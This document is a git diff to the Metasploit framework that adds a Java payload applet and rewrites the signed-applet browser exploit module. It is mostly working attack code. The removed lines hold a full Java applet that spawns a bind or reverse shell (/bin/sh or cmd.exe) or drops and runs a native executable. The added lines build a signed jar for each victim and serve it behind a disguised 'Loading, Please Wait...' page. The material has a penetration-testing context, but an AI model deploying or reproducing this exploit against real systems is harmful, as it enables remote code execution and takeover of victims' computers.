zdoBVJSKMf3XLo16zCS+U;|PNYO>9Pp(Nfro(8jhxN1;n-p6FcLQ-VL*zaj+Z#ViwW
zVhn{)p%-HZyM*2yKXPI?pC=bjX;xZY<O=;5dk6`GMP~V-G=;XwB|n>jXJ=(;GE3;z
zja;*2E&lh*+6C*J&>vlof0s>crSti*OZO+j^tLLNd}AbRyA*?+SWfS!6{i`7Xvn?p
uc_4R${2RhLf+W~Dcmu6mU1+o}4~2Q6wdft*3&Qc?D}q(s5y%wZ`F{ZD5Jv0(

literal 0
HcmV?d00001

diff --git a/external/source/javapayload/src/metasploit/PayloadApplet.java b/external/source/javapayload/src/metasploit/PayloadApplet.java
new file mode 100644
index 0000000000..6cb6a80a01
--- /dev/null
+++ b/external/source/javapayload/src/metasploit/PayloadApplet.java
@@ -0,0 +1,14 @@
+
+package metasploit;
+
+import java.applet.*;
+
+public class PayloadApplet extends Applet {
+    public void init() {
+        try {
+            Payload.main(null);
+        } catch (Exception ex) {
+            ex.printStackTrace();
+        }
+    }
+}
diff --git a/modules/exploits/multi/browser/java_signed_applet.rb b/modules/exploits/multi/browser/java_signed_applet.rb
index cc4607be6c..7499758821 100644
--- a/modules/exploits/multi/browser/java_signed_applet.rb
+++ b/modules/exploits/multi/browser/java_signed_applet.rb
@@ -46,23 +46,14 @@ class Metasploit3 < Msf::Exploit::Remote
 			[
 				[ 'URL', 'http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf' ],
 			],
-			'Platform'      => [ 'win', 'osx', 'linux', 'solaris' ],
-			'Payload'       => { 'Space' => 2048, 'BadChars' => '', 'DisableNops' => true },
+			'Platform'      => [ 'java', 'win', 'osx', 'linux', 'solaris' ],
+			'Payload'       => { 'BadChars' => '', 'DisableNops' => true },
 			'Targets'       =>
 				[
-					# Generic java payload is mostly useless right now, as it kills as soon as the user browses
-					# to another page. It should be rewritten to launch a new JVM in the background with a custom
-					# .class.
-					#
-					# Look up the path to bin/java, dump .class to java.io.tmpdir, then bin/java foo.class via
-					# /bin/sh or cmd.exe
 					[ 'Generic (Java Payload)',
 						{
-							# This is a bad hack to force only the generic/shell_bind_tcp
-							# and generic/shell_reverse_tcp payloads
-							'Platform' => ['win'],
-							'Payload' => { 'Space' => 0 },
-							'Arch' => ARCH_CMD,
+							'Platform' => ['java'],
+							'Arch' => ARCH_JAVA
 						}
 					],
 					[ 'Windows x86 (Native Payload)',
@@ -71,6 +62,12 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Arch' => ARCH_X86,
 						}
 					],
+					[ 'Linux x86 (Native Payload)',
+						{
+							'Platform' => 'linux',
+							'Arch' => ARCH_X86,
+						}
+					],
 					[ 'Mac OS X PPC (Native Payload)',
 						{
 							'Platform' => 'osx',
@@ -83,12 +80,6 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Arch' => ARCH_X86,
 						}
 					],
-					[ 'Linux x86 (Native Payload)',
-						{
-							'Platform' => 'linux',
-							'Arch' => ARCH_X86,
-						}
-					],
 				],
 			'DefaultTarget' => 1
 		))
@@ -109,245 +100,15 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 
-	def exploit
-		#
-		# Currently doing all processing in on_request_uri.
-		# If this is too slow, we can move applet generation up here.
-		#
-
-		@use_static = false
-
-		if not @jvm_init
-			print_error
-			print_error "The JDK failed to initialized: #{@java_error}"
-			print_error "In order to dynamically sign the applet, you must install the Java Development Kit, the rjb gem, and set the JAVA_HOME environment variable."
-			print_error
-			print_error "Falling back to static signed applet.  This exploit will still work, but the CERTCN and APPLETNAME variables will be ignored."
-			print_error
-			@use_static = true
-		end
-
-		if datastore['SaveToFile']
-			appletsource = get_code
-			save_to_file( appletsource['classnames'], appletsource['codefiles'], datastore['SaveToFile'] )
-		end
-
-		super
-	end
-
-	def get_code
-
-		appletsource = <<-EOF
-import java.applet.Applet;
-import java.io.ByteArrayInputStream;
-import java.io.ObjectInputStream;
-import java.io.BufferedReader;
-import java.io.BufferedWriter;
-import java.io.File;
-import java.io.FileOutputStream;
-import java.io.InputStream;
-import java.io.InputStreamReader;
-import java.io.OutputStream;
-import java.io.OutputStreamWriter;
-import java.net.ServerSocket;
-import java.net.Socket;
-import java.security.AccessController;
-import java.security.PrivilegedExceptionAction;
-
-public class #{datastore['APPLETNAME']} extends Applet
-{
-
-	public void init()
-	{
-		try
-		{
-			String data  = getParameter( "data" );
-			String lhost = getParameter( "lhost" );
-			String lport = getParameter( "lport" );
-
-			if( data == null ) {
-				data = "";
-			}
-
-			//System.out.println("Applet executing. Creating payload class.");
-
-			#{datastore['PAYLOADNAME']} site = new #{datastore['PAYLOADNAME']} ();
-			//System.out.println("Payload class instantiated.");
-			site.data  = data;
-
-			if( lhost != null && lport != null) {
-				site.lhost = lhost;
-				site.lport = Integer.parseInt(lport);
-				System.out.println("lhost: " + lhost);
-				System.out.println("lport: " + Integer.parseInt(lport));
-			}
-
-			//System.out.println("data: " + data);
-
-			site.run();
-		}
-		catch( Exception e ) { System.out.println("Applet error: " + e); }
-	}
-
-	class #{datastore['PAYLOADNAME']} implements PrivilegedExceptionAction
-	{
-		// This will contain a hex string of the native payload to drop and execute.
-		public String data = null;
-		// If no native payload is set we get either a java bind shell or a java
-		// reverse shell.
-		public String lhost = null;
-		public int lport = 4444;
-
-		class StreamConnector extends Thread
-		{
-			InputStream is;
-			OutputStream os;
-
-			StreamConnector( InputStream is, OutputStream os )
-			{
-				this.is = is;
-				this.os = os;
-			}
-
-			public void run()
-			{
-				BufferedReader in = null;
-				BufferedWriter out = null;
-
-				try
-				{
-					in = new BufferedReader( new InputStreamReader( is ) );
-					out = new BufferedWriter( new OutputStreamWriter( os ) );
-					char buffer[] = new char[8192];
-					int length;
-					while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
-					{
-						out.write( buffer, 0, length );
-						out.flush();
-					}
-				}
-				catch( Exception e ) { System.out.println( "StreamConnector error: " + e); }
-
-				try
-				{
-					if( in != null )
-						in.close();
-					if( out != null )
-						out.close();
-				}
-				catch( Exception e ) { System.out.println( "StreamConnector error: " + e); }
-			}
-		}
-
-		// http://stackoverflow.com/questions/140131/convert-a-string-representation-of-a-hex-dump-to-a-byte-array-using-java
-		public byte[] StringToBytes( String s )
-		{
-			byte[] data = new byte[s.length() / 2];
-
-			for( int i = 0 ; i < s.length() ; i += 2 )
-				data[i / 2] = (byte)( ( Character.digit( s.charAt( i ), 16 ) << 4 ) + Character.digit( s.charAt( i + 1 ), 16 ) );
-
-			return data;
-		}
-
-		public Object run() throws Exception
-		{
-			//System.out.println("Applet running...");
-
-			try
-			{
-				String os = System.getProperty( "os.name" );
-
-				// if we have no native payload to drop and execute we default to
-				// either a TCP bind or reverse shell.
-				//if( #{datastore['PAYLOADNAME']}.data.length() == 0 )
-				if( this.data.length() == 0 )
-				{
-					//System.out.println("Applet thinks payload.data is empty.");
-					Socket client_socket = null;
-
-					String shell = "/bin/sh";
-
-					if( os.indexOf( "Windows" ) >= 0 )
-						shell = "cmd.exe";
-
-					//if( #{datastore['PAYLOADNAME']}.lhost == null )
-					if( this.lhost == null )
-					{
-						//ServerSocket server_socket = new ServerSocket( #{datastore['PAYLOADNAME']}.lport );
-						ServerSocket server_socket = new ServerSocket( this.lport );
-						client_socket = server_socket.accept();
-					}
-					else
-					{
-						//client_socket = new Socket( #{datastore['PAYLOADNAME']}.lhost, #{datastore['PAYLOADNAME']}.lport );
-						client_socket = new Socket( this.lhost, this.lport );
-					}
-
-					if( client_socket != null )
-					{
-						Process process = Runtime.getRuntime().exec( shell );
-
-						( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start();
-
-						( new StreamConnector( process.getErrorStream(), client_socket.getOutputStream() ) ).start();
-
-						( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start();
-					}
-				}
-				else
-				{
-					//System.out.println("Applet knows there's data to write. Writing to: " + System.getProperty( "java.io.tmpdir" ));
-					String filename = Math.random() + ".exe";
-					String path = System.getProperty( "java.io.tmpdir" ) + File.separator + filename;
-					//System.out.println(filename + " written.");
-
-					Process p;
-					FileOutputStream fos = new FileOutputStream( path );
-
-					//fos.write( StringToBytes( #{datastore['PAYLOADNAME']}.data ) );
-					fos.write( StringToBytes( this.data ) );
-
-					fos.close();
-
-					if( os.indexOf( "Windows" ) < 0 )
-					{
-						p = Runtime.getRuntime().exec( "chmod 755 " + path );
-						p.waitFor();
-					}
-
-					p = Runtime.getRuntime().exec( path );
-
-					p.waitFor();
-
-					new File( path ).delete();
-				}
-			}
-			catch( Exception e ) { System.out.println("Payload execution error: " + e); }
-
-			return null;
-		}
-
-		public void #{datastore['PAYLOADNAME']}()
-		{
-			try
-			{
-				AccessController.doPrivileged( this );
-			}
-			catch( Exception e ) { System.out.println("Payload instantiation error: " + e); }
-		}
-	}
-}
-EOF
-		appletcode = {
-			'classnames' => [ datastore['APPLETNAME'] ],
-			'codefiles'  => [ appletsource ]
-		}
-
-		return appletcode
-	end
-
 	def on_request_uri( cli, request )
+		payload = regenerate_payload(cli)
+		if not payload
+			print_error( "Failed to generate the payload." )
+			# Send them a 404 so the browser doesn't hang waiting for data
+			# that will never come.
+			send_not_found(cli)
+			return
+		end
 
 		if not request.uri.match(/\.jar$/i)
 			if not request.uri.match(/\/$/)
@@ -357,108 +118,68 @@ EOF
 
 			print_status( "Handling request from #{cli.peerhost}:#{cli.peerport}..." )
 
-			if target.name == 'Generic (Java Payload)'
-				if datastore['LHOST']
-					host = datastore['LHOST']
-					port = datastore['LPORT']
-					print_status( "Payload will be a Java reverse shell to #{host}:#{port} from #{cli.peerhost}..." )
-				else
-					port = datastore['LPORT']
-					datastore['RHOST'] = cli.peerhost
-					print_status( "Payload will be a Java bind shell on #{cli.peerhost}:#{port}..." )
-				end
-			else
-				payload = regenerate_payload( cli )
-				if not payload
-					print_error( "Failed to generate the payload." )
-					return
-				end
-
-				# NOTE: The EXE mixin automagically handles detection of arch/platform
-				data = generate_payload_exe
-
-				if data
-					print_status( "Generated executable to drop (#{data.length} bytes)." )
-					data = Rex::Text.to_hex( data, prefix="" )
-				else
-					print_error( "Failed to generate the executable." )
-					return
-				end
-			end
-
-			if not @use_static
-				# See #1543
-				if datastore['CERTCN'].index(",")
-					print_error("CERTCN cannot contain a comma due to a bug in Rjb, commas will be removed")
-				end
-
-				appletcode = get_code
-
-				print_status "Compiling applet classes..."
-				compile( appletcode['classnames'], appletcode['codefiles'] )
-
-				print_status "Compile completed.  Building jar file..."
-
-				unsignedjar = "unsigned_#{datastore['APPLETNAME']}.jar"
-				@signedjar   = "#{datastore['APPLETNAME']}.jar"
-
-				build_jar( unsignedjar,
-						[
-							# Applet
-							datastore['APPLETNAME'] + ".class",
-							# PayloadX class
-							datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + ".class",
-							# PayloadX StreamConnector for pure Java payload
-							datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + "$StreamConnector.class"
-						]
-					)
-
-				print_status "Jar built.  Signing..."
-
-				sign_jar( datastore['CERTCN'], unsignedjar, @signedjar )
-
-				print_status "Jar signed.  Ready to send."
-			else
-				print_status "Using static, signed jar.  Ready to send."
-			end
-
-			# TODO: gzip data and parse in java
-			send_response_html( cli, generate_html( data, host, port ), { 'Content-Type' => 'text/html' } )
+			send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
 			return
 		end
 
-		# load the jar file
-		if @use_static
-			path = File.join( Msf::Config.install_root, "data", "exploits", "java_signed_applet.jar" )
-		elsif File.exists? File.join( datastore['JAVACACHE'], @signedjar )
-			path = File.join( datastore['JAVACACHE'], @signedjar )
-		end
+		# If we haven't returned yet, then this is a request for our applet
+		# jar, build one for this victim.
 
-		if path
-			fd = File.open( path, "rb" )
-			@jar_data = fd.read(fd.stat.size)
-			fd.close
+		p = regenerate_payload(cli)
+		jar = p.encoded_jar
+
+		files = [
+			"metasploit/Payload.class",
+			"metasploit/PayloadApplet.class",
+			"META-INF/MANIFEST.MF",
+			"META-INF/SIGNFILE.DSA",
+			"META-INF/SIGNFILE.SF",
+		]
+
+		# Ghetto.  Replace existing files in the Jar, then add in
+		# anything that wasn't replaced.  The reason for replacing the
+		# .class files is to ensure that we're sending the
+		# Payload.class as was signed rather than a newer one that was
+		# updated without updating the signature.  We'll just have to
+		# cross our fingers and hope that any updates don't break
+		# backwards compatibility in the handler until we can get
+		# signing to work from ruby.  Once we can sign jars directly
+		# from ruby using OpenSSL, this won't be a problem.
+		replaced = []
+		# Replace the ones that are already there.
+		jar.entries.map do |e|
+			file = File.join(Msf::Config.data_directory, "exploits", "java_signed_applet", e.name)
+			if File.file? file
+				File.open(file, "rb") do |f|
+					e.data = f.read(f.stat.size)
+				end
+			end
+			replaced << e.name
 		end
+		# Add the rest
+		files.each { |e|
+			next if replaced.include? e
+			file = File.join(Msf::Config.data_directory, "exploits", "java_signed_applet", e)
+			File.open(file, "rb") do |f|
+				jar.add_file(e, f.read(f.stat.size))
+			end
+		}
 
 		print_status( "Sending #{datastore['APPLETNAME']}.jar to #{cli.peerhost}:#{cli.peerport}.  Waiting for user to click 'accept'..." )
-		send_response( cli, @jar_data, { 'Content-Type' => "application/octet-stream" } )
+		send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )
 
 		handler( cli )
 
 	end
 
-	def generate_html( data, host, port )
-		html  = "<html><head><title>Loading, Please Wait...</title></head>"
-		html += "<body><center><p>Loading, Please Wait...</p></center>"
-		html += "<applet archive=\"#{datastore['APPLETNAME']}.jar\" "
-		html += "code=\"#{datastore['APPLETNAME']}.class\" width=\"1\" height=\"1\">"
-
-		html += "<param name=\"data\" value=\"#{data}\"/>" if data
-		html += "<param name=\"lhost\" value=\"#{host}\"/>" if host
-		html += "<param name=\"lport\" value=\"#{port}\"/>" if port
-
-		html += "</applet></body></html>"
+	def generate_html
+		html  = %Q|<html><head><title>Loading, Please Wait...</title></head> |
+		html += %Q|<body><center><p>Loading, Please Wait...</p></center> |
+		html += %Q|<applet archive="#{datastore["APPLETNAME"]}.jar" |
+		html += %Q|  code="metasploit.PayloadApplet" width="1" height="1">\n|
+		html += %Q|</applet></body></html>|
 		return html
 	end
 
 end
+